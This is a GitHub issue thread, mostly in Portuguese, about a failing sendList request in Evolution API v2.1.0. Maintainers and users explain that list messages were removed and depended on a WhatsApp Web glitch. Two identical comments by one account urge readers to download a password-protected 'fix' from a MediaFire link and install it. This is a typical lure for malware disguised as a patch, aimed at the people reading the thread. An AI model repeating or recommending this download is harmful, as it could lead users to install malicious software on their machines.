### ISSUE TITLE
SendList - WA Business

### ISSUE THREAD

**Issue by FilSantos** [EvolutionAPI/evolution-api#824]
### Bem-vido!

- [X] Sim, pesquisei problemas semelhantes no [GitHub](https://github.com/EvolutionAPI/evolution-api/issues) e não encontrei nenhum.

### O que você fez?

Dado que tanto no CodeChat/Baileys tem suporte, porém como explicado em ambos os repositorios o unico pre requisito é que seja uma conta business e minha conta é business

Quando tento enviar sendList esta voltando mensagem de erro 

Mensagem de erro:
{
    "status": 400,
    "error": "Bad Request",
    "response": {
        "message": [
            [
                "instance requires property \"title\"",
                "instance requires property \"footerText\"",
                "instance requires property \"buttonText\"",
                "instance requires property \"sections\""
            ]
        ]
    }
}

### O que você esperava?

envio da mensagem com sucesso

### O que vc observou ao invés do que esperava?

{
    "status": 400,
    "error": "Bad Request",
    "response": {
        "message": [
            [
                "instance requires property \"title\"",
                "instance requires property \"footerText\"",
                "instance requires property \"buttonText\"",
                "instance requires property \"sections\""
            ]
        ]
    }
}

### Capturas de Tela/Vídeos

curl --location 'http://localhost/message/sendList/teste' \
--header 'Content-Type: application/json' \
--header 'apikey: ContactCenter01' \
--data '{
    "number": "559999999999 (Recipient number with Country Code)",
    "options": {
        "delay": 1200,
        "presence": "composing"
    },
    "listMessage": {
        "title": "List Title",
        "description": "List description",
        "buttonText": "Click Here",
        "footerText": "footer list\nhttps://examplelink.com.br",
        "sections": [
            {
                "title": "Row tilte 01",
                "rows": [
                    {
                        "title": "Title row 01",
                        "description": "Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry'\''s standard dummy text ever since the 1500s,",
                        "rowId": "rowId 001"
                    },
                    {
                        "title": "Title row 02",
                        "description": "Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry'\''s standard dummy text ever since the 1500s,",
                        "rowId": "rowId 002"
                    }
                ]
            },
            {
                "title": "Row tilte 02",
                "rows": [
                    {
                        "title": "Title row 01",
                        "description": "Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry'\''s standard dummy text ever since the 1500s,",
                        "rowId": "rowId 001"
                    },
                    {
                        "title": "Title row 02",
                        "description": "Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry'\''s standard dummy text ever since the 1500s,",
                        "rowId": "rowId 002"
                    }
                ]
            }
        ]
    }
}'

### Qual versão da API você está usando?

2.1.0

### Qual é o seu ambiente?

Docker

### Outras expecificações do ambiente

2vcpu, 4gb

### Se aplicável, cole a saída do log

.

### Notas Adicionais

.

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by luannsr12** [comment]
o SendList foi removido dessa nova versão, uma pena pois na versão antiga ainda funciona. Como uso no meu negócio terei que deixar a versão 1.8 instalada. Não entendo porque removeram já que é um recurso muito útil.

Pra quem quiser usar o SendList tem que usar antes da versão 2

**Comment by dpaes** [comment]
A principio listas e botões são um recurso exclusivo da cloud api, o evolution permite enviar se vc tiver o token da Meta para isso. Esse tipo de recurso pra funcionar é necessário a exploração de um bug em que a propria baileys mesmo disponibilizando em algumas versões passou a deixar de disponibilizar. Foi inserido em uma versão da v2 porém não durou uma semana, digo isso para que entendam que ao usar uma api não oficial você não pode querer disponibilizar um recurso que amanhã pode não funcionar, então recomendo que não passem para seus clientes esse tipo de recurso pois é arriscado. Estarei fechando essa issue por conta do bug na verdade se tratar de um glitch do whatsapp web e que não é garantido que funcione futuramente (como ja foi tmb corrigida pela Meta)
